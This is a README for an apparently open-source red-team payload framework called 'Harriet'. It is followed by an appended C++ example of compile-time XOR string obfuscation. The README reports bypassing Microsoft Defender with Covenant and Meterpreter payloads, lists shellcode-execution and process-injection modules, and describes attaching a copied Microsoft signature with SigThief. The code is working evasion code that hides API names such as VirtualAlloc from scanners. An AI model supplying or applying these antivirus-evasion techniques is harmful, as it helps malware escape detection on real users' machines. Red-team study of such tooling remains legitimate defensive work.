This repo is a resource for various red teaming techniques and tools based on open source software and non-commerical tools.

Primary language: C++

Harriet

[Screenshot, 2022-10-17]

The payload framework is very effective when paired with my Covenant Randomizer script.

[Screenshot, 2022-10-17]

I was able to bypass Defender with Covenant with no problems.

[Screenshot, 2022-10-17]

I was also able to bypass Defender with a Meterpreter payload. This might not be as effective, since Meterpreter is so heavily signatured. Your results will vary unless you modify your Meterpreter payload's template inside Metasploit. Going with lesser-used payloads will probably yield better results.

Modules

[Screenshot, 2022-10-17]

There are currently four modules. As of this writing, all of them bypass AV/Defender.

AES-encrypted payload

AES-encrypted payload with process injection

QueueUserAPC shellcode execution

ThreadPoolWait shellcode execution

All of the modules use XOR encryption for string and function-name obfuscation and AES encryption for the payload, which is decrypted in memory at execution time. Once the payload is compiled, the script uses SigThief to sign the binary with a Microsoft certificate. Note that SigThief copies the Authenticode signature block from an existing signed binary rather than producing a valid signature of its own: the copied signature will not validate (Get-AuthenticodeSignature reports HashMismatch, and signtool verify fails), so it only helps against checks that look for the presence of a certificate rather than verifying it.
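The string-obfuscation half of the technique described above (used by all four modules listed under Modules), as an added example rather than Harriet's own code. It XORs string literals at compile time so the plaintext never reaches the image, decrypts them just before use, and includes the byte-scan check a practitioner would run to confirm the plaintext is really gone. The key byte 0x5A, the rolling-key formula and the helper names are arbitrary choices for this example; the AES payload decryption and the QueueUserAPC/ThreadPoolWait execution primitives are not shown. The Windows-only resolver at the bottom compiles only under _WIN32 and is inert elsewhere.

```cpp
// Added example (not Harriet's own code): compile-time XOR string obfuscation
// of the kind the README describes, plus the check that the plaintext is
// really absent from the stored bytes. Key byte 0x5A and the rolling-key
// formula are arbitrary choices for this example.
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <string>
#ifdef _WIN32
#include <windows.h>
#endif

// Holds a string literal XORed at compile time. Because the object is built
// inside a constexpr context, the compiler never emits the plaintext; only the
// XORed bytes land in the image. decrypt() recovers it at runtime, just before
// use, so the cleartext lives briefly on the heap rather than in .rdata.
template <std::size_t N, std::uint8_t Key>
class XorStr {
public:
    constexpr explicit XorStr(const char (&s)[N]) : data_{} {
        for (std::size_t i = 0; i < N; ++i)
            data_[i] = static_cast<char>(s[i] ^ key_at(i));
    }
    std::string decrypt() const {
        std::string out(N - 1, '\0');          // N includes the terminator
        for (std::size_t i = 0; i < N - 1; ++i)
            out[i] = static_cast<char>(data_[i] ^ key_at(i));
        return out;
    }
    const char* raw() const { return data_; }   // what actually sits in the binary
    static constexpr std::size_t size() { return N; }
private:
    // Position-dependent key so repeated characters don't repeat in the output.
    static constexpr std::uint8_t key_at(std::size_t i) {
        return static_cast<std::uint8_t>(Key + i * 7);
    }
    char data_[N];
};

// Forces constant evaluation: the lambda's constexpr local must be computed
// by the compiler, so the literal is XORed before any code runs.
#define XORSTR(s) ([] { constexpr auto x = XorStr<sizeof(s), 0x5A>(s); return x; }())

// The check a string scanner performs: does the raw buffer contain the
// plaintext anywhere? Run it against the obfuscated bytes to confirm they don't.
bool contains_plaintext(const char* buf, std::size_t len, const std::string& needle) {
    if (needle.empty() || needle.size() > len) return false;
    for (std::size_t i = 0; i + needle.size() <= len; ++i)
        if (std::memcmp(buf + i, needle.data(), needle.size()) == 0) return true;
    return false;
}

// Round-trip demo: the obfuscated form hides the API name and decrypt()
// restores it exactly.
std::string demo_decrypt() {
    return XORSTR("VirtualAlloc").decrypt();
}

bool demo_plaintext_hidden() {
    auto s = XORSTR("VirtualAlloc");
    return !contains_plaintext(s.raw(), s.size(), "VirtualAlloc");
}

#ifdef _WIN32
// Windows-only usage: resolve an API through obfuscated names so neither
// "kernel32.dll" nor "VirtualAlloc" appears as cleartext in the loader image.
FARPROC resolve_virtualalloc() {
    const std::string mod = XORSTR("kernel32.dll").decrypt();
    const std::string fn  = XORSTR("VirtualAlloc").decrypt();
    HMODULE h = GetModuleHandleA(mod.c_str());
    return h ? GetProcAddress(h, fn.c_str()) : nullptr;
}
#endif
```

The lambda in XORSTR is what makes this work: a constexpr local must be evaluated by the compiler, so the XOR happens at build time and the literal never survives into the object file. After building, run strings or a hex search over the binary for the API names you wrapped; they should not appear, while the decrypted std::string still exists in heap memory for the short window it is in use.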